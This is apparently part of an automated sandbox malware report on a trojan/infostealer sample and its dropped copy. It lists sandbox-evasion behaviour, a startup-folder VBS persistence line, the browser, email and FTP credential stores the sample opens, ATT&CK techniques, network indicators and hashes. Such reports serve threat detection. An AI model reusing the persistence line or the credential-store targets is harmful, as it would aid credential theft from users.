                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 1596 Thread sleep time: -96120s >= -30000s
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 1596 Thread sleep time: -95854s >= -30000s
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 1596 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 4924 Thread sleep time: -14757395258967632s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 4924 Thread sleep time: -100000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 5660 Thread sleep count: 2122 > 30
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 5660 Thread sleep count: 3258 > 30
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 4924 Thread sleep time: -99875s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 4924 Thread sleep time: -99766s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 4924 Thread sleep time: -99641s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 4924 Thread sleep time: -99516s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 4924 Thread sleep time: -99406s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 4924 Thread sleep time: -99297s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 4924 Thread sleep time: -99181s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 4924 Thread sleep time: -99062s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 4924 Thread sleep time: -98950s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 4924 Thread sleep time: -98842s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 4924 Thread sleep time: -98729s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 4924 Thread sleep time: -98609s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 4924 Thread sleep time: -98500s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 4924 Thread sleep time: -98391s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 4924 Thread sleep time: -98266s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 4924 Thread sleep time: -98156s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 4924 Thread sleep time: -98027s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 4924 Thread sleep time: -97922s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 4924 Thread sleep time: -97813s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 4924 Thread sleep time: -97688s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 4924 Thread sleep time: -97563s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 4924 Thread sleep time: -97438s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 4924 Thread sleep time: -97313s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 4924 Thread sleep time: -97188s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 4924 Thread sleep time: -97077s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 2208 Thread sleep time: -22136092888451448s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 2208 Thread sleep time: -100000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 5820 Thread sleep count: 5744 > 30
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 2208 Thread sleep time: -99890s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 5820 Thread sleep count: 1738 > 30
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 2208 Thread sleep time: -99781s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 2208 Thread sleep time: -99671s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 2208 Thread sleep time: -99562s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 2208 Thread sleep time: -99451s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 2208 Thread sleep time: -99342s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 2208 Thread sleep time: -99234s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 2208 Thread sleep time: -99087s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 2208 Thread sleep time: -98937s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 2208 Thread sleep time: -98805s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 2208 Thread sleep time: -98687s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 2208 Thread sleep time: -98578s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 2208 Thread sleep time: -98468s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 2208 Thread sleep time: -98359s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 2208 Thread sleep time: -98250s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 2208 Thread sleep time: -98140s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 2208 Thread sleep time: -98031s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 2208 Thread sleep time: -97921s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 2208 Thread sleep time: -97812s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 2208 Thread sleep time: -97703s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 2208 Thread sleep time: -97593s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 2208 Thread sleep time: -97484s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 2208Thread sleep time: -97374s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 2208Thread sleep time: -97265s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 2208Thread sleep time: -97156s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 2208Thread sleep time: -97046s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 2208Thread sleep time: -96937s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 2208Thread sleep time: -96828s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 2208Thread sleep time: -96716s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 2208Thread sleep time: -96584s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 2208Thread sleep time: -96453s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 2208Thread sleep time: -96330s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 2208Thread sleep time: -96102s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 2208Thread sleep time: -95984s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 2208Thread sleep time: -95874s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 2208Thread sleep time: -95765s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 2208Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Roaming\iulue.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\Desktop\Ref#20203216.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\Ref#20203216.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\iulue.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\iulue.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
                      Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\
                      Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
                      Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\
                      Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\
                      Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
                      Source: Ref#20203216.exe, 00000001.00000002.2967690730.00000000061A9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllHA
                      Source: wscript.exe, 00000003.00000002.1867757911.000001B14E8B5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: iulue.exe, 00000004.00000002.1929062673.0000000002A89000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                      Source: iulue.exe, 00000004.00000002.1929062673.0000000002A89000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: model0Microsoft|VMWare|Virtual
                      Source: iulue.exe, 00000004.00000002.1926732056.0000000000D71000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllJ
                      Source: Ref#20203216.exe, 00000000.00000002.1755703275.000000000139C000.00000004.00000020.00020000.00000000.sdmp, iulue.exe, 00000007.00000002.2954784194.000000000120C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\Ref#20203216.exe Process information queried: ProcessInformation
                      Source: C:\Users\user\Desktop\Ref#20203216.exe Process token adjusted: Debug
                      Source: C:\Users\user\Desktop\Ref#20203216.exe Memory allocated: page read and write | page guard
                      Source: C:\Users\user\Desktop\Ref#20203216.exe Process created: C:\Users\user\Desktop\Ref#20203216.exe "C:\Users\user\Desktop\Ref#20203216.exe"
                      Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Roaming\iulue.exe "C:\Users\user\AppData\Roaming\iulue.exe"
                      Source: C:\Users\user\AppData\Roaming\iulue.exe Process created: C:\Users\user\AppData\Roaming\iulue.exe "C:\Users\user\AppData\Roaming\iulue.exe"
                      Source: C:\Users\user\Desktop\Ref#20203216.exe Queries volume information: C:\Users\user\Desktop\Ref#20203216.exe VolumeInformation
                      Source: C:\Users\user\Desktop\Ref#20203216.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Ref#20203216.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Ref#20203216.exe Queries volume information: C:\Users\user\Desktop\Ref#20203216.exe VolumeInformation
                      Source: C:\Users\user\Desktop\Ref#20203216.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Ref#20203216.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Ref#20203216.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Ref#20203216.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Ref#20203216.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\iulue.exe Queries volume information: C:\Users\user\AppData\Roaming\iulue.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\iulue.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\iulue.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\iulue.exe Queries volume information: C:\Users\user\AppData\Roaming\iulue.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\iulue.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\iulue.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\iulue.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\iulue.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\iulue.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Ref#20203216.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information

Source: C:\Users\user\Desktop\Ref#20203216.exe, Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\AppData\Roaming\iulue.exe, Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\AppData\Roaming\iulue.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\iulue.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\iulue.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\AppData\Roaming\iulue.exe, File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Users\user\AppData\Roaming\iulue.exe, File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
Source: C:\Users\user\AppData\Roaming\iulue.exe, File opened: C:\FTP Navigator\Ftplist.txt
Source: C:\Users\user\Desktop\Ref#20203216.exe, File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\Desktop\Ref#20203216.exe, Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\user\Desktop\Ref#20203216.exe, Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\AppData\Roaming\iulue.exe, File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Roaming\iulue.exe, Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\user\AppData\Roaming\iulue.exe, Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities

                      Remote Access Functionality

Source: Yara match, File source: dump.pcap, type: PCAP
Source: Yara match, File source: Process Memory Space: Ref#20203216.exe PID: 6776, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: Ref#20203216.exe PID: 2120, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: iulue.exe PID: 3264, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: iulue.exe PID: 7116, type: MEMORYSTR

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: 111 Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: 121 Windows Management Instrumentation; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: 111 Scripting; 1 DLL Side-Loading; 2 Registry Run Keys / Startup Folder; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: 1 DLL Side-Loading; 11 Process Injection; 2 Registry Run Keys / Startup Folder; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: 1 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 11 Obfuscated Files or Information; 1 Software Packing; 1 DLL Side-Loading; 1 Masquerading; 141 Virtualization/Sandbox Evasion; 11 Process Injection
Credential Access: 2 OS Credential Dumping; 1 Input Capture; 1 Credentials in Registry; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: 2 File and Directory Discovery; 24 System Information Discovery; 1 Query Registry; 311 Security Software Discovery; 1 Process Discovery; 141 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 System Network Configuration Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: 11 Archive Collected Data; 2 Data from Local System; 1 Email Collection; 1 Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: 1 Ingress Tool Transfer; 11 Encrypted Channel; 1 Non-Standard Port; 2 Non-Application Layer Protocol; 23 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
[Behavior graph: ID 1579787, Sample: Ref#20203216.exe, Startdate: 23/12/2024, Architecture: WINDOWS, Score: 100]

Source | Detection | Scanner | Label
Ref#20203216.exe | 47% | Virustotal |
Ref#20203216.exe | 37% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
Ref#20203216.exe | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\iulue.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\iulue.exe | 37% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
                      No Antivirus matches
                      No Antivirus matches
                      No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
oshi.at | 5.253.86.15 | true | false | | high
api.ipify.org | 104.26.13.205 | true | false | | high
Name | Malicious | Antivirus Detection | Reputation
https://api.ipify.org/ | false | | high
https://oshi.at/nvgU | false | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
104.26.13.205 | api.ipify.org | United States | 13335 | CLOUDFLARENETUS | false
162.254.34.31 | unknown | United States | 64200 | VIVIDHOSTINGUS | true
5.253.86.15 | oshi.at | Cyprus | 208046 | HOSTSLICK-GERMANYNL | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1579787
Start date and time: 2024-12-23 09:07:52 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 6s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 9
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
                                                                            Technologies:
                                                                            • HCA enabled
                                                                            • EGA enabled
                                                                            • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Ref#20203216.exe
Detection: MAL
Classification: mal100.troj.spyw.expl.evad.winEXE@8/3@2/3
                                                                            EGA Information:
                                                                            • Successful, ratio: 50%
                                                                            HCA Information:
                                                                            • Successful, ratio: 94%
                                                                            • Number of executed functions: 205
                                                                            • Number of non-executed functions: 23
                                                                            Cookbook Comments:
                                                                            • Found application associated with file extension: .exe
                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                            • Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.63, 4.245.163.56
                                                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ocsps.ssl.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                            • Execution Graph export aborted for target Ref#20203216.exe, PID 6776 because it is empty
                                                                            • Execution Graph export aborted for target iulue.exe, PID 3264 because it is empty
                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
03:08:45 | API Interceptor | 62x Sleep call for process: Ref#20203216.exe modified
03:09:02 | API Interceptor | 63x Sleep call for process: iulue.exe modified
08:08:53 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\iulue.vbs
                                                                                                Process:C:\Users\user\Desktop\Ref#20203216.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):80
                                                                                                Entropy (8bit):4.694702276078294
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:FER/n0eFHHot+kiEaKC5THn:FER/lFHIwknaZ5L
                                                                                                MD5:CE80F653F6D49CE4B39F540447D8AD8D
                                                                                                SHA1:928B13E9FD16BAE3C5B201AF876E61DEC0C6CCF7
                                                                                                SHA-256:848144E4A7F7E983071CAA524758B7F66E923CC32FFC98F67FFEFCF3D6BD00DC
                                                                                                SHA-512:F58A6E04E8FC2D82FA94AA7391E5FD0146E627A1F1843C1FC67CA4E7AF77C90129512CBC0DF7E50BD1A4874990ABA4DBD7097EED9B72099579416832F6993CB2
                                                                                                Malicious:true
                                                                                                Reputation:low
                                                                                                Preview:CreateObject("WScript.Shell").Run """C:\Users\user\AppData\Roaming\iulue.exe"""
                                                                                                Process:C:\Users\user\Desktop\Ref#20203216.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):154592
                                                                                                Entropy (8bit):6.07753472477252
                                                                                                Encrypted:false
                                                                                                SSDEEP:1536:aj9JxITkjSu9L8xIWCPAHWoTwuckbZrSV6ICB3pQpYvNX81zJfqK6XiFZKj:aj+TTup8omWiwLcCxSZQpe5WzJfV62M
                                                                                                MD5:9F9DF5620E05DA5BBF797B8531DA35AB
                                                                                                SHA1:22BE3755C61F577FB39E4D71DF0F8D9BFB90AA87
                                                                                                SHA-256:E97247599A336032A86EA5CB42B3B9C971567977E245B689D87C3F2EF3D200E4
                                                                                                SHA-512:365554A00606263906AF881542FF87999C32D30389798219DEB9CB384874A9700EBA56EE883B1DC5238890A6A5EA15F8C3861182B267FB0A6B196BCBDF39E480
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                • Antivirus: ReversingLabs, Detection: 37%
                                                                                                Reputation:low
                                                                                                Process:C:\Users\user\Desktop\Ref#20203216.exe
                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                Category:modified
                                                                                                Size (bytes):26
                                                                                                Entropy (8bit):3.95006375643621
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:ggPYV:rPYV
                                                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                Malicious:true
                                                                                                Reputation:high, very likely benign file
                                                                                                Preview:[ZoneTransfer]....ZoneId=0
                                                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Entropy (8bit):6.07753472477252
                                                                                                TrID:
                                                                                                • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                                • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                • DOS Executable Generic (2002/1) 0.01%
                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                File name:Ref#20203216.exe
                                                                                                File size:154'592 bytes
                                                                                                MD5:9f9df5620e05da5bbf797b8531da35ab
                                                                                                SHA1:22be3755c61f577fb39e4d71df0f8d9bfb90aa87
                                                                                                SHA256:e97247599a336032a86ea5cb42b3b9c971567977e245b689d87c3f2ef3d200e4
                                                                                                SHA512:365554a00606263906af881542ff87999c32d30389798219deb9cb384874a9700eba56ee883b1dc5238890a6a5ea15f8c3861182b267fb0a6b196bcbdf39e480
                                                                                                SSDEEP:1536:aj9JxITkjSu9L8xIWCPAHWoTwuckbZrSV6ICB3pQpYvNX81zJfqK6XiFZKj:aj+TTup8omWiwLcCxSZQpe5WzJfV62M
                                                                                                TLSH:30E339106BBCCF13C79C95BEE4E001348774CDA26226E7576B807CF969727819BCA297
                                                                                                Icon Hash:27d8dcd6d4d85007
                                                                                                Entrypoint:0x4211de
                                                                                                Entrypoint Section:.text
                                                                                                Digitally signed:true
                                                                                                Imagebase:0x400000
                                                                                                Subsystem:windows gui
                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                Time Stamp:0x6768ACE9 [Mon Dec 23 00:20:57 2024 UTC]
                                                                                                TLS Callbacks:
                                                                                                CLR (.Net) Version:
                                                                                                OS Version Major:4
                                                                                                OS Version Minor:0
                                                                                                File Version Major:4
                                                                                                File Version Minor:0
                                                                                                Subsystem Version Major:4
                                                                                                Subsystem Version Minor:0
                                                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                Signature Valid:false
                                                                                                Signature Issuer:CN=SSL.com EV Code Signing Intermediate CA RSA R3, O=SSL Corp, L=Houston, S=Texas, C=US
                                                                                                Signature Validation Error:The digital signature of the object did not verify
                                                                                                Error Number:-2146869232
                                                                                                Not Before, Not After
                                                                                                • 04/07/2024 00:35:32 15/05/2027 11:15:04
                                                                                                Subject Chain
                                                                                                • OID.1.3.6.1.4.1.311.60.2.1.3=VN, OID.2.5.4.15=Private Organization, CN="DUC FABULOUS CO.,LTD", SERIALNUMBER=0105838409, O="DUC FABULOUS CO.,LTD", L=Hanoi, C=VN
                                                                                                Version:3
                                                                                                Thumbprint MD5:FF0E889D2A73C3A679605952D35452DC
                                                                                                Thumbprint SHA-1:2C1D12F8BBE0827400A8440AF74FFFA8DCC8097C
